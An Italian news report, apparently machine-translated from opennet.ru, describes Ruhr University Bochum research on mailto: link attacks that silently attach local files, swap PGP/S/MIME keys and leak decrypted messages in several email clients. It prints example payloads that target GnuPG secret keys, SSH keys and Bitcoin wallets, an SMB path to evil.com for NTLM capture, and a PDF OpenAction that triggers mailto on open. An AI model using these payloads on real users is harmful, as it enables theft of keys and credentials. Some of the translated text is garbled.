Ricercatori dell’Università della Ruhr di Bochum (Germania) () comportamento dei client di posta durante l'elaborazione di collegamenti “mailto:” con parametri avanzati. Cinque dei venti client di posta esaminati erano vulnerabili a un attacco che manipolava la sostituzione delle risorse utilizzando il parametro "attach". Altri sei client di posta elettronica erano vulnerabili a un attacco di sostituzione delle chiavi PGP e S/MIME e tre client erano vulnerabili a un attacco volto a estrarre il contenuto di messaggi crittografati.
Collegamenti «"vengono utilizzati per automatizzare l'apertura di un client di posta elettronica per poter scrivere una lettera al destinatario indicato nel link. Oltre all'indirizzo, puoi specificare parametri aggiuntivi come parte del collegamento, come l'oggetto della lettera e un modello per il contenuto tipico. L'attacco proposto manipola il parametro “attach”, che permette di allegare un allegato al messaggio generato.
I client di posta Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) e Pegasus Mail erano vulnerabili a un banale attacco che consente di allegare automaticamente qualsiasi file locale, specificato tramite un collegamento come "mailto:?attach=path_to_file". Il file viene allegato senza visualizzare un avviso, quindi senza particolare attenzione l'utente potrebbe non accorgersi che la lettera verrà inviata con un allegato.
Ad esempio, utilizzando un collegamento come "mailto:[email protected]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" puoi inserire le chiavi private di GnuPG nella lettera. Puoi anche inviare il contenuto dei portafogli crittografici (~/.bitcoin/wallet.dat), le chiavi SSH (~/.ssh/id_rsa) e qualsiasi file accessibile all'utente. Inoltre, Thunderbird ti consente di allegare gruppi di file tramite maschera utilizzando costrutti come “attach=/tmp/*.txt”.
Oltre ai file locali, alcuni client di posta elettronica elaborano i collegamenti allo spazio di archiviazione di rete e ai percorsi nel server IMAP. In particolare, IBM Notes consente di trasferire un file da una directory di rete durante l'elaborazione di collegamenti come "attach=\\evil.com\dummyfile", nonché di intercettare i parametri di autenticazione NTLM inviando un collegamento a un server SMB controllato dall'aggressore (la richiesta verrà inviata con i parametri di autenticazione correnti dell'utente).
Thunderbird elabora con successo richieste come "attach=imap:///fetch>UID>/INBOX>1/", che consentono di allegare contenuti dalle cartelle sul server IMAP. Allo stesso tempo, i messaggi recuperati da IMAP, crittografati tramite OpenPGP e S/MIME, vengono automaticamente decrittografati dal client di posta prima dell'invio. Gli sviluppatori di Thunderbird erano sul problema a febbraio e nel numero il problema è già stato risolto (i rami 52, 60 e 68 di Thunderbird rimangono vulnerabili).
Le vecchie versioni di Thunderbird erano vulnerabili anche ad altre due varianti di attacco PGP e S/MIME proposte dai ricercatori. In particolare, Thunderbird, così come OutLook, PostBox, eM Client, MailMate e R2Mail2, è stato oggetto di un attacco di sostituzione della chiave, causato dal fatto che il client di posta importa e installa automaticamente nuovi certificati trasmessi nei messaggi S/MIME, che consente all'attaccante di organizzare la sostituzione delle chiavi pubbliche già memorizzate dall'utente.
Il secondo attacco, a cui sono vulnerabili Thunderbird, PostBox e MailMate, manipola le caratteristiche del meccanismo di salvataggio automatico delle bozze dei messaggi e consente, utilizzando parametri mailto, di avviare la decrittazione di messaggi crittografati o l'aggiunta di una firma digitale per messaggi arbitrari, con successiva trasmissione del risultato al server IMAP dell'aggressore. In questo attacco, il testo cifrato viene trasmesso attraverso il parametro “body” e il tag “meta refresh” viene utilizzato per avviare una chiamata al server IMAP dell’aggressore. Per esempio: ' '
Per elaborare automaticamente i collegamenti "mailto:" senza l'interazione dell'utente, è possibile utilizzare documenti PDF appositamente progettati: l'azione OpenAction in PDF consente di avviare automaticamente il gestore mailto all'apertura di un documento:
% PDF-1.5
1 0 ogg
<< /Tipo /Catalogo /OpenAction [2 0 R] >>
endob
2 0 ogg
<< /Type /Action /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[…])>>
endob
Fonte: opennet.ru